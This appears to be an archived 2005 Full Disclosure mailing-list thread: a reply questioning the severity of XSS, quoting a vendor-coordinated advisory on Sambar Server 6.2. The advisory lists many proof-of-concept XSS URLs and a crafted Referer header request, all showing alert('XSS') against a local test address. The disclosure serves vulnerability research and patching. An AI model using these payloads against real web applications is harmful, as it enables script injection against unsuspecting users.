Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: XSS in Sambar Server version 6.2
From: Daniel <deeper () gmail com>
Date: Tue, 24 May 2005 15:44:39 +0100

"A user can input a specially crafted script that when rendered by the
application..."

Hopefully you can explain:

- Is the user required to be logged in first, or can this be done
unauthenticated
- Are you able to steal any aspect of the session management logic
using this method
- Are you able to, in any way, gain access to the sambar installation
using this technique?

I have issues with any XSS security research being more than a low
risk, unless you can modify the logic of the application or gain
access to the platform in question.
Automated scanning tools love XSS issues as they are easy to find, but
in reality bloody hard to exploit (wow, i have made a jscript window
popup)

ps, its not a personal attack, just me failing to understand the logic
of XSS attacks (hell its like 1999 when responding to ICMP packets was
seen as a risk)







On 5/23/05, jamie fisher <contact_jamie_fisher () yahoo co uk> wrote:

                     - Sambar - 
AFFECTED PRODUCTS:
================== 
Sambar Server 6.2 
http://www.sambar.com/ 

OVERVIEW: 
========= 
Sambar is an all-in-one and fully functional Web, HTTP, HTTPS, Mail, IRC,
Syslog, Proxy and FTP server. 

HISTORY:
======== 
17th April 2005 - First discovered
17th April 2005 - Contacted vendor
20th April 2005 - Vendor reply
20th May 2005 - Patch available 

DETAILS:
======== 
Multiple XSS found in the administrative interface. 
In some instances Sambar Server version 6.2 does not correctly filter HTML
code from user-supplied 
input. A user can input a specially crafted script that when rendered by the
application, will cause arbitrary scripting to be executed by the user's
browser. The code will originate from the site running the Sambar Server
version 6.2 software and will run in the security context of that site. 

ISSUE:
====== 
Crafted input of causes the application to output what is known as a Cross
Site Script.  The script is rendered upon visitation to the affected the
page served by the application. 
EXAMPLE:
======== 
Standard XSS within the /search directory:
========================================== 
1.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=10&query=Folder%name
2.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=10&query=Folder%name
3.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=20&query=Folder%20name
4.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=20&query=Folder%20name
5.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=30&query=Folder%20name
6.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=30&query=Folder%20name
7.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=40&query=Folder%20name
8.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=40&query=Folder%20name
9.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=50&query=Folder%20name
10.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=50&query=Folder%20name
11.
http://192.168.0.5/search/results.stm?indexname=>"><script>alert("XSS")</script>&style=fancy&spage=60&query=Folder%20name
12.
http://192.168.0.5/search/results.stm?indexname=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>&style=fancy&spage=60&query=Folder%20name
Standard XSS within the /session directory:
=========================================== 
1.
http://192.168.0.5/session/logout?RCredirect=>'><script>alert('XSS')</script>
2.
http://192.168.0.5/session/logout?RCredirect=>"><script>alert("XSS")</script>
3.
http://192.168.0.5/session/logout?RCredirect=>%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>
HTML XSS within the /search directory:
====================================== 
1.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=10&query=Folder%20name
2.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=20&query=Folder%20name
3.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=30&query=Folder%20name
4.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;
%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=40&query=Folder%20name
5.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=50&query=Folder%20name
6.
http://192.168.0.5/search/results.stm?indexname=>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;XSS%26quot;)>&style=fancy&spage=60&query=Folder%20name
No chevron '<' '>' XSS within the /search directory:
==================================================== 
1.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=10&query=Folder%20name
2.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=20&query=Folder%20name
3.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=30&query=Folder%20name
4.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=40&query=Folder%20name
5.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=50&query=Folder%20name
6.
http://192.168.0.5/search/results.stm?indexname=%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OA%3D%22&style=fancy&spage=60&query=Folder%20name
Escaping from HTML XSS within the /session directory:
==================================================== 
1.
http://192.168.0.5/session/logout?RCredirect=--><script>alert(%27XSS%27)</script>
Including XSS within referrer:
============================== 
1.
GET /CheckingXssInReferer.html HTTP/1.0
Cookie:
RCuid=SS1-1113767443-uh287LUVlBbVwpESKaZ29/hq0cDSVneAgWlracaqApQ=;
RCslb=5; RCrelogin=false
Host: 192.168.0.5
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Referer: "></a><script>alert('XSS')</script> 

SOLUTION: 
========= 
Sambar Server has been contacted and has released patches. 
Note: There were probably a lot more input validation errors but due to a
whinning girlfriend work had to be cut short :) 

REFERENCE:
========== 
http://www.sambar.com/security.htm 
http://homepage.hispeed.ch/spamtrap/sambar62p.exe 

CREDITS: 
======== 
Tod Sambar for understanding the issue and resolving in a timely manner. 
  
This vulnerability was discovered and researched by Jamie Fisher 
mail: contact_jamie_fisher[at]yahoo.co.uk

 ________________________________
Yahoo! Messenger NEW - crystal clear PC to PC calling worldwide with
voicemail 


_______________________________________________
Full-Disclosure - We believe in it.
Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]